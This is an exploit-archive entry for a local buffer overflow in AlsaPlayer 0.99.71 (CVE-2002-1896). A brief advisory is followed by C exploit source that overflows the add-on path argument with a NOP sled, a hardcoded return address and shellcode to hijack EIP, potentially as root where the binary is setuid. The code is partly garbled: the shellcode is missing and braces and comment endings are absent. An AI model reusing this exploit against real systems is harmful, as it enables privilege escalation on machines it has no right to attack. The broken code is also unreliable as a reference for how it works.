AlsaPlayer 0.99.71 - Local Buffer Overflow

Related Vulnerabilities: CVE-2002-1896  
Publish Date: 20 Sep 2002
Author: zillion


Alsaplayer is a PCM player that utilizes the ALSA libraries and drivers. It is availabe for Linux and Unix platforms.

A vulnerability has been discovered in Alsaplayer. By specifying an overly long "add-on path", it is possible for an attacker to overrun the buffer, potentially allowing for execution of attacker-supplied code.

It should be noted that although Alsaplayer is not installed setuid by default, it is common practice for users to add a setuid bit to obtain certain functionality. 

 * Alsaplayer exploit for a buffer overflow found by KF (
 * This program is not installed with special permissions by default.
 * However, the author himself does recommend to do so under certain
 * conditions:
 * Author: zillion[at] (09/2002)
 * Tested on Red Hat 7.3 linux with alsaplayer-devel-0.99.71-1

#include <unistd.h>
#include <sys/stat.h>
#include <string.h>

#define BUFFER_SIZE 1056
#define NOP 0x90
#define RET 0xbfffe440

char shellcode[]=


void print_error(char * burb) {
  printf(" Error: %s !\n",burb); exit(0);

void usage(char *progname) {
  printf("\n*--- -- -  Alsaplayer b0f exploit - -- ---*\n");
  printf("\nDefault: %s  -f /path/to/alsaplayer",progname);
  printf("\nOption : %s  -o <offset>\n\n",progname);

int main(int argc, char **argv){

  char buffer[BUFFER_SIZE];
  char file[30];
  long retaddress;
  int arg,offset=500;

  struct stat sbuf;

  if(argc < 2) { usage(argv[0]); }

  while ((arg = getopt (argc, argv, "f:o:")) != -1){
    switch (arg){
    case 'f':
      if(stat(argv[2], &sbuf)) { print_error("No such file");}
    case 'o':
      offset = atoi(optarg);
      if(offset < 0) { print_error("Offset must be positive");}
    default :

  retaddress = (RET - offset);
  memcpy(buffer + BUFFER_SIZE - (sizeof(shellcode) + 8) ,shellcode,sizeof(shellcode) -1);

  /* Overwrite EBP and EIP */
  *(long *)&buffer[BUFFER_SIZE - 8]  = retaddress;
  *(long *)&buffer[BUFFER_SIZE - 4]  = retaddress;

  if(execl(file,file,"-p",buffer,NULL) != 0) {
    print_error("Could not execute alsaplayer ");

  return 0;
